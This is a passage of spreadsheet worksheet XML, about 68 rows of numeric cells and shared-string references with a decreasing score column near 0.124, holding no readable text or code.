        <v>5786.0</v>
      </c>
      <c r="B20100" s="2">
        <v>4.6753912E7</v>
      </c>
      <c r="C20100" s="2" t="s">
        <v>19381</v>
      </c>
      <c r="D20100" s="2">
        <v>1.0</v>
      </c>
      <c r="E20100" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20100" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="20101" ht="15.75" customHeight="1">
      <c r="A20101" s="1">
        <v>11951.0</v>
      </c>
      <c r="B20101" s="2">
        <v>2.5559875E7</v>
      </c>
      <c r="C20101" s="2" t="s">
        <v>19382</v>
      </c>
      <c r="D20101" s="2">
        <v>1.0</v>
      </c>
      <c r="E20101" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20101" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="20102" ht="15.75" customHeight="1">
      <c r="A20102" s="1">
        <v>12756.0</v>
      </c>
      <c r="B20102" s="2">
        <v>3.1134802E7</v>
      </c>
      <c r="C20102" s="2" t="s">
        <v>19383</v>
      </c>
      <c r="D20102" s="2">
        <v>1.0</v>
      </c>
      <c r="E20102" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20102" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="20103" ht="15.75" customHeight="1">
      <c r="A20103" s="1">
        <v>28742.0</v>
      </c>
      <c r="B20103" s="2">
        <v>2.8083918E7</v>
      </c>
      <c r="C20103" s="2" t="s">
        <v>19384</v>
      </c>
      <c r="D20103" s="2">
        <v>1.0</v>
      </c>
      <c r="E20103" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20103" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="20104" ht="15.75" customHeight="1">
      <c r="A20104" s="1">
        <v>18423.0</v>
      </c>
      <c r="B20104" s="2">
        <v>5.2711752E7</v>
      </c>
      <c r="C20104" s="2" t="s">
        <v>19385</v>
      </c>
      <c r="D20104" s="2">
        <v>1.0</v>
      </c>
      <c r="E20104" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20104" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="20105" ht="15.75" customHeight="1">
      <c r="A20105" s="1">
        <v>18626.0</v>
      </c>
      <c r="B20105" s="2">
        <v>5.3377381E7</v>
      </c>
      <c r="C20105" s="2" t="s">
        <v>19386</v>
      </c>
      <c r="D20105" s="2">
        <v>1.0</v>
      </c>
      <c r="E20105" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20105" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="20106" ht="15.75" customHeight="1">
      <c r="A20106" s="1">
        <v>3587.0</v>
      </c>
      <c r="B20106" s="2">
        <v>3.902723E7</v>
      </c>
      <c r="C20106" s="2" t="s">
        <v>19387</v>
      </c>
      <c r="D20106" s="2">
        <v>1.0</v>
      </c>
      <c r="E20106" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20106" s="2">
        <v>0.1252354048964219</v>
      </c>
    </row>
    <row r="20107" ht="15.75" customHeight="1">
      <c r="A20107" s="1">
        <v>861.0</v>
      </c>
      <c r="B20107" s="2">
        <v>2.1764869E7</v>
      </c>
      <c r="C20107" s="2" t="s">
        <v>19388</v>
      </c>
      <c r="D20107" s="2">
        <v>1.0</v>
      </c>
      <c r="E20107" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20107" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="20108" ht="15.75" customHeight="1">
      <c r="A20108" s="1">
        <v>941.0</v>
      </c>
      <c r="B20108" s="2">
        <v>2.2431998E7</v>
      </c>
      <c r="C20108" s="2" t="s">
        <v>19389</v>
      </c>
      <c r="D20108" s="2">
        <v>1.0</v>
      </c>
      <c r="E20108" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20108" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="20109" ht="15.75" customHeight="1">
      <c r="A20109" s="1">
        <v>14610.0</v>
      </c>
      <c r="B20109" s="2">
        <v>4.0251502E7</v>
      </c>
      <c r="C20109" s="2" t="s">
        <v>19390</v>
      </c>
      <c r="D20109" s="2">
        <v>1.0</v>
      </c>
      <c r="E20109" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20109" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="20110" ht="15.75" customHeight="1">
      <c r="A20110" s="1">
        <v>3195.0</v>
      </c>
      <c r="B20110" s="2">
        <v>3.7228414E7</v>
      </c>
      <c r="C20110" s="2" t="s">
        <v>19391</v>
      </c>
      <c r="D20110" s="2">
        <v>1.0</v>
      </c>
      <c r="E20110" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20110" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="20111" ht="15.75" customHeight="1">
      <c r="A20111" s="1">
        <v>31902.0</v>
      </c>
      <c r="B20111" s="2">
        <v>5296419.0</v>
      </c>
      <c r="C20111" s="2" t="s">
        <v>19392</v>
      </c>
      <c r="D20111" s="2">
        <v>1.0</v>
      </c>
      <c r="E20111" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20111" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="20112" ht="15.75" customHeight="1">
      <c r="A20112" s="1">
        <v>3156.0</v>
      </c>
      <c r="B20112" s="2">
        <v>3.7001129E7</v>
      </c>
      <c r="C20112" s="2" t="s">
        <v>19393</v>
      </c>
      <c r="D20112" s="2">
        <v>1.0</v>
      </c>
      <c r="E20112" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20112" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="20113" ht="15.75" customHeight="1">
      <c r="A20113" s="1">
        <v>19423.0</v>
      </c>
      <c r="B20113" s="2">
        <v>5.5664422E7</v>
      </c>
      <c r="C20113" s="2" t="s">
        <v>19394</v>
      </c>
      <c r="D20113" s="2">
        <v>1.0</v>
      </c>
      <c r="E20113" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20113" s="2">
        <v>0.1247723132969035</v>
      </c>
    </row>
    <row r="20114" ht="15.75" customHeight="1">
      <c r="A20114" s="1">
        <v>3131.0</v>
      </c>
      <c r="B20114" s="2">
        <v>3.6858263E7</v>
      </c>
      <c r="C20114" s="2" t="s">
        <v>19395</v>
      </c>
      <c r="D20114" s="2">
        <v>1.0</v>
      </c>
      <c r="E20114" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20114" s="2">
        <v>0.1247723132969034</v>
      </c>
    </row>
    <row r="20115" ht="15.75" customHeight="1">
      <c r="A20115" s="1">
        <v>6682.0</v>
      </c>
      <c r="B20115" s="2">
        <v>4.9179039E7</v>
      </c>
      <c r="C20115" s="2" t="s">
        <v>19396</v>
      </c>
      <c r="D20115" s="2">
        <v>1.0</v>
      </c>
      <c r="E20115" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20115" s="2">
        <v>0.1247379454926625</v>
      </c>
    </row>
    <row r="20116" ht="15.75" customHeight="1">
      <c r="A20116" s="1">
        <v>15158.0</v>
      </c>
      <c r="B20116" s="2">
        <v>4.1988168E7</v>
      </c>
      <c r="C20116" s="2" t="s">
        <v>19397</v>
      </c>
      <c r="D20116" s="2">
        <v>1.0</v>
      </c>
      <c r="E20116" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20116" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="20117" ht="15.75" customHeight="1">
      <c r="A20117" s="1">
        <v>19692.0</v>
      </c>
      <c r="B20117" s="2">
        <v>5.6472479E7</v>
      </c>
      <c r="C20117" s="2" t="s">
        <v>19398</v>
      </c>
      <c r="D20117" s="2">
        <v>1.0</v>
      </c>
      <c r="E20117" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20117" s="2">
        <v>0.1245519713261649</v>
      </c>
    </row>
    <row r="20118" ht="15.75" customHeight="1">
      <c r="A20118" s="1">
        <v>2076.0</v>
      </c>
      <c r="B20118" s="2">
        <v>3.1127296E7</v>
      </c>
      <c r="C20118" s="2" t="s">
        <v>19399</v>
      </c>
      <c r="D20118" s="2">
        <v>1.0</v>
      </c>
      <c r="E20118" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20118" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20119" ht="15.75" customHeight="1">
      <c r="A20119" s="1">
        <v>7393.0</v>
      </c>
      <c r="B20119" s="2">
        <v>5.1099033E7</v>
      </c>
      <c r="C20119" s="2" t="s">
        <v>19400</v>
      </c>
      <c r="D20119" s="2">
        <v>1.0</v>
      </c>
      <c r="E20119" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20119" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20120" ht="15.75" customHeight="1">
      <c r="A20120" s="1">
        <v>9768.0</v>
      </c>
      <c r="B20120" s="2">
        <v>5.650134E7</v>
      </c>
      <c r="C20120" s="2" t="s">
        <v>19401</v>
      </c>
      <c r="D20120" s="2">
        <v>1.0</v>
      </c>
      <c r="E20120" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20120" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20121" ht="15.75" customHeight="1">
      <c r="A20121" s="1">
        <v>11065.0</v>
      </c>
      <c r="B20121" s="2">
        <v>1.8253598E7</v>
      </c>
      <c r="C20121" s="2" t="s">
        <v>19402</v>
      </c>
      <c r="D20121" s="2">
        <v>1.0</v>
      </c>
      <c r="E20121" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20121" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20122" ht="15.75" customHeight="1">
      <c r="A20122" s="1">
        <v>13025.0</v>
      </c>
      <c r="B20122" s="2">
        <v>3.2944157E7</v>
      </c>
      <c r="C20122" s="2" t="s">
        <v>19403</v>
      </c>
      <c r="D20122" s="2">
        <v>1.0</v>
      </c>
      <c r="E20122" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20122" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20123" ht="15.75" customHeight="1">
      <c r="A20123" s="1">
        <v>13987.0</v>
      </c>
      <c r="B20123" s="2">
        <v>3.7356577E7</v>
      </c>
      <c r="C20123" s="2" t="s">
        <v>19404</v>
      </c>
      <c r="D20123" s="2">
        <v>1.0</v>
      </c>
      <c r="E20123" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20123" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20124" ht="15.75" customHeight="1">
      <c r="A20124" s="1">
        <v>14195.0</v>
      </c>
      <c r="B20124" s="2">
        <v>3.8186338E7</v>
      </c>
      <c r="C20124" s="2" t="s">
        <v>19405</v>
      </c>
      <c r="D20124" s="2">
        <v>1.0</v>
      </c>
      <c r="E20124" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20124" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20125" ht="15.75" customHeight="1">
      <c r="A20125" s="1">
        <v>16104.0</v>
      </c>
      <c r="B20125" s="2">
        <v>4.5398161E7</v>
      </c>
      <c r="C20125" s="2" t="s">
        <v>19406</v>
      </c>
      <c r="D20125" s="2">
        <v>1.0</v>
      </c>
      <c r="E20125" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20125" s="2">
        <v>0.1244855967078189</v>
      </c>
    </row>
    <row r="20126" ht="15.75" customHeight="1">
      <c r="A20126" s="1">
        <v>258.0</v>
      </c>
      <c r="B20126" s="2">
        <v>1.5141344E7</v>
      </c>
      <c r="C20126" s="2" t="s">
        <v>19407</v>
      </c>
      <c r="D20126" s="2">
        <v>1.0</v>
      </c>
      <c r="E20126" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20126" s="2">
        <v>0.1244131455399061</v>
      </c>
    </row>
    <row r="20127" ht="15.75" customHeight="1">
      <c r="A20127" s="1">
        <v>4457.0</v>
      </c>
      <c r="B20127" s="2">
        <v>4.2422703E7</v>
      </c>
      <c r="C20127" s="2" t="s">
        <v>19408</v>
      </c>
      <c r="D20127" s="2">
        <v>1.0</v>
      </c>
      <c r="E20127" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20127" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="20128" ht="15.75" customHeight="1">
      <c r="A20128" s="1">
        <v>17990.0</v>
      </c>
      <c r="B20128" s="2">
        <v>5.1392529E7</v>
      </c>
      <c r="C20128" s="2" t="s">
        <v>19409</v>
      </c>
      <c r="D20128" s="2">
        <v>1.0</v>
      </c>
      <c r="E20128" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20128" s="2">
        <v>0.1243386243386244</v>
      </c>
    </row>
    <row r="20129" ht="15.75" customHeight="1">
      <c r="A20129" s="1">
        <v>8239.0</v>
      </c>
      <c r="B20129" s="2">
        <v>5.3357553E7</v>
      </c>
      <c r="C20129" s="2" t="s">
        <v>19410</v>
      </c>
      <c r="D20129" s="2">
        <v>1.0</v>
      </c>
      <c r="E20129" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20129" s="2">
        <v>0.1243386243386243</v>
      </c>
    </row>
    <row r="20130" ht="15.75" customHeight="1">
      <c r="A20130" s="1">
        <v>2168.0</v>
      </c>
      <c r="B20130" s="2">
        <v>3.17669E7</v>
      </c>
      <c r="C20130" s="2" t="s">
        <v>19411</v>
      </c>
      <c r="D20130" s="2">
        <v>1.0</v>
      </c>
      <c r="E20130" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20130" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20131" ht="15.75" customHeight="1">
      <c r="A20131" s="1">
        <v>4247.0</v>
      </c>
      <c r="B20131" s="2">
        <v>4.1801813E7</v>
      </c>
      <c r="C20131" s="2" t="s">
        <v>19412</v>
      </c>
      <c r="D20131" s="2">
        <v>1.0</v>
      </c>
      <c r="E20131" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20131" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20132" ht="15.75" customHeight="1">
      <c r="A20132" s="1">
        <v>5748.0</v>
      </c>
      <c r="B20132" s="2">
        <v>4.6644912E7</v>
      </c>
      <c r="C20132" s="2" t="s">
        <v>19413</v>
      </c>
      <c r="D20132" s="2">
        <v>1.0</v>
      </c>
      <c r="E20132" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20132" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20133" ht="15.75" customHeight="1">
      <c r="A20133" s="1">
        <v>14984.0</v>
      </c>
      <c r="B20133" s="2">
        <v>4.1408698E7</v>
      </c>
      <c r="C20133" s="2" t="s">
        <v>19414</v>
      </c>
      <c r="D20133" s="2">
        <v>1.0</v>
      </c>
      <c r="E20133" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20133" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20134" ht="15.75" customHeight="1">
      <c r="A20134" s="1">
        <v>15272.0</v>
      </c>
      <c r="B20134" s="2">
        <v>4.2361382E7</v>
      </c>
      <c r="C20134" s="2" t="s">
        <v>19415</v>
      </c>
      <c r="D20134" s="2">
        <v>1.0</v>
      </c>
      <c r="E20134" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20134" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20135" ht="15.75" customHeight="1">
      <c r="A20135" s="1">
        <v>16396.0</v>
      </c>
      <c r="B20135" s="2">
        <v>4.6284595E7</v>
      </c>
      <c r="C20135" s="2" t="s">
        <v>19416</v>
      </c>
      <c r="D20135" s="2">
        <v>1.0</v>
      </c>
      <c r="E20135" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20135" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20136" ht="15.75" customHeight="1">
      <c r="A20136" s="1">
        <v>16459.0</v>
      </c>
      <c r="B20136" s="2">
        <v>4.6452429E7</v>
      </c>
      <c r="C20136" s="2" t="s">
        <v>19416</v>
      </c>
      <c r="D20136" s="2">
        <v>1.0</v>
      </c>
      <c r="E20136" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20136" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20137" ht="15.75" customHeight="1">
      <c r="A20137" s="1">
        <v>18111.0</v>
      </c>
      <c r="B20137" s="2">
        <v>5.174432E7</v>
      </c>
      <c r="C20137" s="2" t="s">
        <v>19417</v>
      </c>
      <c r="D20137" s="2">
        <v>1.0</v>
      </c>
      <c r="E20137" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20137" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20138" ht="15.75" customHeight="1">
      <c r="A20138" s="1">
        <v>19283.0</v>
      </c>
      <c r="B20138" s="2">
        <v>5.5169394E7</v>
      </c>
      <c r="C20138" s="2" t="s">
        <v>19418</v>
      </c>
      <c r="D20138" s="2">
        <v>1.0</v>
      </c>
      <c r="E20138" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20138" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20139" ht="15.75" customHeight="1">
      <c r="A20139" s="1">
        <v>19961.0</v>
      </c>
      <c r="B20139" s="2">
        <v>5.7546942E7</v>
      </c>
      <c r="C20139" s="2" t="s">
        <v>19419</v>
      </c>
      <c r="D20139" s="2">
        <v>1.0</v>
      </c>
      <c r="E20139" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20139" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20140" ht="15.75" customHeight="1">
      <c r="A20140" s="1">
        <v>33261.0</v>
      </c>
      <c r="B20140" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C20140" s="2" t="s">
        <v>19420</v>
      </c>
      <c r="D20140" s="2">
        <v>1.0</v>
      </c>
      <c r="E20140" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20140" s="2">
        <v>0.1242424242424242</v>
      </c>
    </row>
    <row r="20141" ht="15.75" customHeight="1">
      <c r="A20141" s="1">
        <v>9611.0</v>
      </c>
      <c r="B20141" s="2">
        <v>5.617249E7</v>
      </c>
      <c r="C20141" s="2" t="s">
        <v>19421</v>
      </c>
      <c r="D20141" s="2">
        <v>1.0</v>
      </c>
      <c r="E20141" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20141" s="2">
        <v>0.1242283950617285</v>
      </c>
    </row>
    <row r="20142" ht="15.75" customHeight="1">
      <c r="A20142" s="1">
        <v>11584.0</v>
      </c>
      <c r="B20142" s="2">
        <v>2.2871285E7</v>
      </c>
      <c r="C20142" s="2" t="s">
        <v>19422</v>
      </c>
      <c r="D20142" s="2">
        <v>1.0</v>
      </c>
      <c r="E20142" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20142" s="2">
        <v>0.1241319444444445</v>
      </c>
    </row>
    <row r="20143" ht="15.75" customHeight="1">
      <c r="A20143" s="1">
        <v>1083.0</v>
      </c>
      <c r="B20143" s="2">
        <v>2.3714935E7</v>
      </c>
      <c r="C20143" s="2" t="s">
        <v>19423</v>
      </c>
      <c r="D20143" s="2">
        <v>1.0</v>
      </c>
      <c r="E20143" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20143" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="20144" ht="15.75" customHeight="1">
      <c r="A20144" s="1">
        <v>4403.0</v>
      </c>
      <c r="B20144" s="2">
        <v>4.227856E7</v>
      </c>
      <c r="C20144" s="2" t="s">
        <v>19424</v>
      </c>
      <c r="D20144" s="2">
        <v>1.0</v>
      </c>
      <c r="E20144" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20144" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="20145" ht="15.75" customHeight="1">
      <c r="A20145" s="1">
        <v>7473.0</v>
      </c>
      <c r="B20145" s="2">
        <v>5.1292894E7</v>
      </c>
      <c r="C20145" s="2" t="s">
        <v>19284</v>
      </c>
      <c r="D20145" s="2">
        <v>1.0</v>
      </c>
      <c r="E20145" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20145" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="20146" ht="15.75" customHeight="1">
      <c r="A20146" s="1">
        <v>17376.0</v>
      </c>
      <c r="B20146" s="2">
        <v>4.951899E7</v>
      </c>
      <c r="C20146" s="2" t="s">
        <v>19425</v>
      </c>
      <c r="D20146" s="2">
        <v>1.0</v>
      </c>
      <c r="E20146" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20146" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="20147" ht="15.75" customHeight="1">
      <c r="A20147" s="1">
        <v>18963.0</v>
      </c>
      <c r="B20147" s="2">
        <v>5.4356442E7</v>
      </c>
      <c r="C20147" s="2" t="s">
        <v>19426</v>
      </c>
      <c r="D20147" s="2">
        <v>1.0</v>
      </c>
      <c r="E20147" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20147" s="2">
        <v>0.1240079365079365</v>
      </c>
    </row>
    <row r="20148" ht="15.75" customHeight="1">
      <c r="A20148" s="1">
        <v>12169.0</v>
      </c>
      <c r="B20148" s="2">
        <v>2.7406528E7</v>
      </c>
      <c r="C20148" s="5" t="s">
        <v>19427</v>
      </c>
      <c r="D20148" s="2">
        <v>1.0</v>
      </c>
      <c r="E20148" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20148" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="20149" ht="15.75" customHeight="1">
      <c r="A20149" s="1">
        <v>32317.0</v>
      </c>
      <c r="B20149" s="2">
        <v>5.5738857E7</v>
      </c>
      <c r="C20149" s="2" t="s">
        <v>19428</v>
      </c>
      <c r="D20149" s="2">
        <v>1.0</v>
      </c>
      <c r="E20149" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20149" s="2">
        <v>0.123931623931624</v>
      </c>
    </row>
    <row r="20150" ht="15.75" customHeight="1">
      <c r="A20150" s="1">
        <v>3963.0</v>
      </c>
      <c r="B20150" s="2">
        <v>4.0722435E7</v>
      </c>
      <c r="C20150" s="2" t="s">
        <v>19429</v>
      </c>
      <c r="D20150" s="2">
        <v>1.0</v>
      </c>
      <c r="E20150" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20150" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20151" ht="15.75" customHeight="1">
      <c r="A20151" s="1">
        <v>3978.0</v>
      </c>
      <c r="B20151" s="2">
        <v>4.0829321E7</v>
      </c>
      <c r="C20151" s="2" t="s">
        <v>19430</v>
      </c>
      <c r="D20151" s="2">
        <v>1.0</v>
      </c>
      <c r="E20151" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20151" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20152" ht="15.75" customHeight="1">
      <c r="A20152" s="1">
        <v>5627.0</v>
      </c>
      <c r="B20152" s="2">
        <v>4.6203228E7</v>
      </c>
      <c r="C20152" s="2" t="s">
        <v>19431</v>
      </c>
      <c r="D20152" s="2">
        <v>1.0</v>
      </c>
      <c r="E20152" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20152" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20153" ht="15.75" customHeight="1">
      <c r="A20153" s="1">
        <v>8617.0</v>
      </c>
      <c r="B20153" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C20153" s="2" t="s">
        <v>19432</v>
      </c>
      <c r="D20153" s="2">
        <v>1.0</v>
      </c>
      <c r="E20153" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20153" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20154" ht="15.75" customHeight="1">
      <c r="A20154" s="1">
        <v>9626.0</v>
      </c>
      <c r="B20154" s="2">
        <v>5.6216729E7</v>
      </c>
      <c r="C20154" s="2" t="s">
        <v>19433</v>
      </c>
      <c r="D20154" s="2">
        <v>1.0</v>
      </c>
      <c r="E20154" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20154" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20155" ht="15.75" customHeight="1">
      <c r="A20155" s="1">
        <v>14070.0</v>
      </c>
      <c r="B20155" s="2">
        <v>3.7616806E7</v>
      </c>
      <c r="C20155" s="2" t="s">
        <v>19434</v>
      </c>
      <c r="D20155" s="2">
        <v>1.0</v>
      </c>
      <c r="E20155" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20155" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20156" ht="15.75" customHeight="1">
      <c r="A20156" s="1">
        <v>15016.0</v>
      </c>
      <c r="B20156" s="2">
        <v>4.1514215E7</v>
      </c>
      <c r="C20156" s="2" t="s">
        <v>19435</v>
      </c>
      <c r="D20156" s="2">
        <v>1.0</v>
      </c>
      <c r="E20156" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20156" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20157" ht="15.75" customHeight="1">
      <c r="A20157" s="1">
        <v>16286.0</v>
      </c>
      <c r="B20157" s="2">
        <v>4.5814913E7</v>
      </c>
      <c r="C20157" s="2" t="s">
        <v>19436</v>
      </c>
      <c r="D20157" s="2">
        <v>1.0</v>
      </c>
      <c r="E20157" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20157" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20158" ht="15.75" customHeight="1">
      <c r="A20158" s="1">
        <v>17206.0</v>
      </c>
      <c r="B20158" s="2">
        <v>4.9037054E7</v>
      </c>
      <c r="C20158" s="2" t="s">
        <v>19437</v>
      </c>
      <c r="D20158" s="2">
        <v>1.0</v>
      </c>
      <c r="E20158" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20158" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20159" ht="15.75" customHeight="1">
      <c r="A20159" s="1">
        <v>18279.0</v>
      </c>
      <c r="B20159" s="2">
        <v>5.224733E7</v>
      </c>
      <c r="C20159" s="2" t="s">
        <v>19438</v>
      </c>
      <c r="D20159" s="2">
        <v>1.0</v>
      </c>
      <c r="E20159" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20159" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20160" ht="15.75" customHeight="1">
      <c r="A20160" s="1">
        <v>33992.0</v>
      </c>
      <c r="B20160" s="2">
        <v>9415025.0</v>
      </c>
      <c r="C20160" s="2" t="s">
        <v>19439</v>
      </c>
      <c r="D20160" s="2">
        <v>1.0</v>
      </c>
      <c r="E20160" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20160" s="2">
        <v>0.1237816764132554</v>
      </c>
    </row>
    <row r="20161" ht="15.75" customHeight="1">
      <c r="A20161" s="1">
        <v>8810.0</v>
      </c>
      <c r="B20161" s="2">
        <v>5.4621991E7</v>
      </c>
      <c r="C20161" s="2" t="s">
        <v>19440</v>
      </c>
      <c r="D20161" s="2">
        <v>1.0</v>
      </c>
      <c r="E20161" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20161" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="20162" ht="15.75" customHeight="1">
      <c r="A20162" s="1">
        <v>30843.0</v>
      </c>
      <c r="B20162" s="2">
        <v>4.5827472E7</v>
      </c>
      <c r="C20162" s="2" t="s">
        <v>19441</v>
      </c>
      <c r="D20162" s="2">
        <v>1.0</v>
      </c>
      <c r="E20162" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20162" s="2">
        <v>0.1237373737373738</v>
      </c>
    </row>
    <row r="20163" ht="15.75" customHeight="1">
      <c r="A20163" s="1">
        <v>2890.0</v>
      </c>
      <c r="B20163" s="2">
        <v>3.5716753E7</v>
      </c>
      <c r="C20163" s="2" t="s">
        <v>19442</v>
      </c>
      <c r="D20163" s="2">
        <v>1.0</v>
      </c>
      <c r="E20163" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20163" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20164" ht="15.75" customHeight="1">
      <c r="A20164" s="1">
        <v>4475.0</v>
      </c>
      <c r="B20164" s="2">
        <v>4.2483084E7</v>
      </c>
      <c r="C20164" s="2" t="s">
        <v>19443</v>
      </c>
      <c r="D20164" s="2">
        <v>1.0</v>
      </c>
      <c r="E20164" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20164" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20165" ht="15.75" customHeight="1">
      <c r="A20165" s="1">
        <v>4661.0</v>
      </c>
      <c r="B20165" s="2">
        <v>4.3133642E7</v>
      </c>
      <c r="C20165" s="2" t="s">
        <v>19444</v>
      </c>
      <c r="D20165" s="2">
        <v>1.0</v>
      </c>
      <c r="E20165" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20165" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20166" ht="15.75" customHeight="1">
      <c r="A20166" s="1">
        <v>5527.0</v>
      </c>
      <c r="B20166" s="2">
        <v>4.5876583E7</v>
      </c>
      <c r="C20166" s="2" t="s">
        <v>19445</v>
      </c>
      <c r="D20166" s="2">
        <v>1.0</v>
      </c>
      <c r="E20166" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F20166" s="2">
        <v>0.1235632183908046</v>
      </c>
    </row>
    <row r="20167" ht="15.75" customHeight="1">
      <c r="A20167" s="1">
        <v>7224.0</v>
      </c>
